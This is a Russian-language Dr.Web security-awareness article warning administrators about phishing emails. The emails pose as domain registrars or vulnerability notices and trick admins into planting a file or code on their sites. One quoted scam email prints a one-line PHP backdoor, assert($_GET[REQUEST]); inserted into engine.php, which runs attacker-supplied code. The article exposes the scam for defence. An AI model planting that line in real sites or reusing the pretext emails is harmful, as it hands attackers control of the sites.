Вы используете устаревший браузер!

Страница может отображаться некорректно.

На удочке

На удочке

Другие выпуски этой рубрики (28)
  • добавить в избранное
    Добавить в закладки

Фишинг на админов

Прочитали: 11058 Комментариев: 73 Рейтинг: 156

21 июня 2017

Фишеры очень любят атаковать офисных менеджеров: замученные постоянными письмами, те не особо вчитываются в очередные электронные сообщения. Но это не означает, что другие категории сотрудников фишеров не интересуют. Вот, скажем, письмо для админов:

#drweb

У нас действительно есть интернет-сервис Dr.Web AV-Desk, поэтому письмо о проблемах с доменом с похожим названием – дело вполне вероятное.

Но приглядимся внимательнее. Письмо прислано на адрес отдела маркетинга. Какое отношение маркетинг имеет к владению сайтом? Далее: вместо того, чтобы затребовать документы, подтверждающие право управления доменом, нас просят создать некий файл. Даже не рассматривая содержимое файла: а вдруг мы на самом деле взломали и увели сайт? Тогда мы с легкостью создадим требуемый файл.

Как обычно, расчет на спешку и панику – дается три дня и ни минуты больше. Письмо, кстати, пришло 2 июня, так что, по идее, нужно было в течение дня все сделать.

Теперь проверяем телефоны при помощи обычного поиска: становится очевидно, что они не принадлежат ни одному из регистраторов сайтов.

Надо отметить, что эта рассылка ходит по Интернету уже не первый день. Фишка в том, что адрес отправителя – корректный. А рассчитывают злоумышленники на то, что пользователь, создав сайт, добавит на свой сайт бэкдор. При обращении к файлу на сайте, содержащему assert, будет выполнен код, переданный в параметрах.

Проверил, письмо пришло от регистратора. Пошел исполнять требование начальства. Минут десять у меня ушло на создание файла и размещение его на сайте. Спешу ответить на письмо регистратора, а то, вдруг файл не найдут, тогда кранты моему домену. Жму на кнопку почтового клиента «Ответить», в письме докладываю об окончании работ по размещению файла у себя на сайте. Отправляю письмо.

Думаете, что тут-то я и понял, что письмо пришло от злодея. Я же написал, что письмо проверял, оно пришло от регистратора, поэтому все проходит штатно, получаю ответ на свое письмо.

http://vbsupport.org/forum/showthread.php?t=52773

Мы не стали отвечать на данное письмо. К сожалению, так поступают не все.

Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят нужный им код.

https://habrahabr.ru/post/265513
https://habrahabr.ru/post/265515

Пошел удалять файл со своего сайта.

А дальше получил ответ на своё письмо, которое написал в ответ на письмо с требованием о размещении файла на своем сайте.

Цитата:

Здравствуйте!

Полученное Вами письмо является мошенническим и отношения к R01 не имеет.

Не рекомендуем внедрять указанный код, поскольку он даст возможность злоумышленникам провести любые манипуляции с содержимым Вашего сайта. Если код все же был размещен, рекомендуем проверить сайт на наличие вредоносного кода и/или восстановить состояние сайта из резервной копии.

С уважением,
...

Есть и другие фишинговые приемы, ориентированные на админов.

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php>

добавьте:

assert($_GET[REQUEST]);

http://vbsupport.org/forum/showthread.php?t=50483

#фишинг #социальная_инженерия #корпоративная_безопасность

Антивирусная правДА! рекомендует

Читая входящие письма, не отключайте голову. Подавляющее большинство фишинговых сообщений отсеивается чистой логикой и по формальными признакам: по отсутствию известного отправителя, личного обращения и наличия обратной связи в подписи. В противном случае вы можете отправить деньги злоумышленникам или (как в данном случае) открыть для них дверь собственными руками.

Ну и, конечно, не забывайте, что использование антиспама убережет не только от почтового мусора и фишинга, но и от троянцев-шифровальщиков.

Оцените выпуск

Сделайте репост

Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей

Комментарии к другим выпускам | Мои комментарии

 
На страницу: